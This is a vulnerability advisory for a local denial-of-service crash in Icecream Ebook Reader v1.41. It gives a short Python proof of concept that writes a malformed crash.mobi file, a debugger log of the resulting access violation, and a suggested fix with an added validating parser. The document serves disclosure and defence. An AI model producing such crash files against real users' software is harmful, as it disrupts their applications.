# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]
#Technical Details & Description:
#================================
#A memory corruption vulnerability was detected in Icecream Ebook Reader v1.41. An attacker can crash the application with a malformed .mobi or .prc file.
#Exploitation is local and requires user interaction: the victim has to open the crafted .mobi or .prc ebook in the reader.
#Piece of Code
#========================================================================
#!/usr/bin/python
# Writes 1000 'A' bytes into crash.mobi; the file has no valid PalmDB/MOBI header.
buffer = "A" * 1000
filename = "crash" + ".mobi"  # For testing with .prc, change the extension
with open(filename, 'w') as f:
    f.write(buffer)
print("File Successfully Created [1]")  # works on both Python 2 and 3
#========================================================================
#Debugging and Error Log
#========================
#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path. *
#* Use .symfix to have the debugger choose a symbol path. *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is:
#ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#7c901230 cc int 3
#0:003> g
#ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0
#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll -
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=????????
#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption
#Solution - Fix & Patch:
#=======================
#Restrict the maximum working size (validate header-derived offsets and lengths against the real file size) and add dedicated exception handling for over-sized or negative read requests.
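#The following is an added illustration of the suggested fix, not code from the vendor or from the advisory's author. It parses the PalmDB container that .mobi and .prc files share (78-byte header, then 8-byte record entries) and refuses to derive a read size from any header field that has not been checked against the actual file length. `trusting_record_length` is an assumed model of a reader that trusts the header; on the PoC's all-'A' file it produces a negative byte count, which is consistent with the `QIODevice::read: Called with maxSize < 0` messages in the log above, but it is not a claim about the application's real code. `MAX_RECORD_LEN` is an illustrative cap, and `build_minimal_mobi` constructs a small well-formed file for comparison.

```python
"""Validating PalmDB/MOBI container parser (added illustration, not vendor code)."""
import struct

PALMDB_HEADER_LEN = 78          # fixed PalmDB header size
RECORD_ENTRY_LEN = 8            # 4-byte offset, 1-byte attrs, 3-byte unique id
KNOWN_TYPE_CREATOR = {(b"BOOK", b"MOBI"), (b"TEXt", b"REAd")}  # .mobi / classic .prc
MAX_RECORD_LEN = 64 * 1024      # assumed per-record cap (illustration value)


class MalformedEbook(ValueError):
    """Raised when the container header does not describe the file it is in."""


def trusting_record_length(data):
    """Assumed model of a reader that trusts the header: for a single-record
    file it reads everything from record 0's offset to EOF. On the advisory's
    all-'A' file the offset is 0x41414141, so the result is a large negative
    number, the kind of value QIODevice::read reports as maxSize < 0."""
    (offset,) = struct.unpack(">I", data[78:82])
    return len(data) - offset


def parse_records(data):
    """Validating parser: returns [(offset, length), ...] or raises
    MalformedEbook. Every header-derived value is checked against the real
    file length before it could become a read size."""
    if len(data) < PALMDB_HEADER_LEN:
        raise MalformedEbook("file shorter than PalmDB header")
    type_id, creator = data[60:64], data[64:68]
    if (type_id, creator) not in KNOWN_TYPE_CREATOR:
        raise MalformedEbook("unknown type/creator %r/%r" % (type_id, creator))
    (num_records,) = struct.unpack(">H", data[76:78])
    if num_records == 0:
        raise MalformedEbook("no records")
    table_end = PALMDB_HEADER_LEN + num_records * RECORD_ENTRY_LEN
    if table_end > len(data):
        raise MalformedEbook("record table (%d entries) runs past EOF" % num_records)
    offsets = [struct.unpack(">I", data[78 + i * 8:82 + i * 8])[0]
               for i in range(num_records)]
    records = []
    for i, offset in enumerate(offsets):
        end = offsets[i + 1] if i + 1 < num_records else len(data)
        if offset < table_end or offset > len(data):
            raise MalformedEbook("record %d offset 0x%x outside file" % (i, offset))
        length = end - offset
        if length < 0 or length > MAX_RECORD_LEN:
            raise MalformedEbook("record %d has invalid length %d" % (i, length))
        records.append((offset, length))
    return records


def build_minimal_mobi(text):
    """Constructed well-formed single-record .mobi container for testing."""
    header = bytearray(PALMDB_HEADER_LEN)
    header[0:9] = b"crashtest"                      # database name
    header[60:64] = b"BOOK"                         # type
    header[64:68] = b"MOBI"                         # creator
    struct.pack_into(">H", header, 76, 1)           # one record
    first_offset = PALMDB_HEADER_LEN + RECORD_ENTRY_LEN
    entry = struct.pack(">I", first_offset) + b"\x00\x00\x00\x00"
    return bytes(header) + entry + text


CRASH_FILE = b"A" * 1000   # same bytes the advisory's PoC writes to crash.mobi


def classify(data):
    """Human-readable verdict for a candidate file."""
    try:
        return "ok: %d record(s)" % len(parse_records(data))
    except MalformedEbook as exc:
        return "rejected: %s" % exc


if __name__ == "__main__":
    print("trusting length on PoC file:", trusting_record_length(CRASH_FILE))
    print("PoC file:", classify(CRASH_FILE))
    print("well-formed file:", classify(build_minimal_mobi(b"Hello MOBI")))
```

#The PoC file is rejected at the type/creator check before any size arithmetic happens; a file with a correct magic but a record count larger than the file can hold is rejected at the record-table bound, and a negative or oversized record length is rejected before it reaches a read call.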
#Author:
#=======
#Kapil Soni (Haxinos)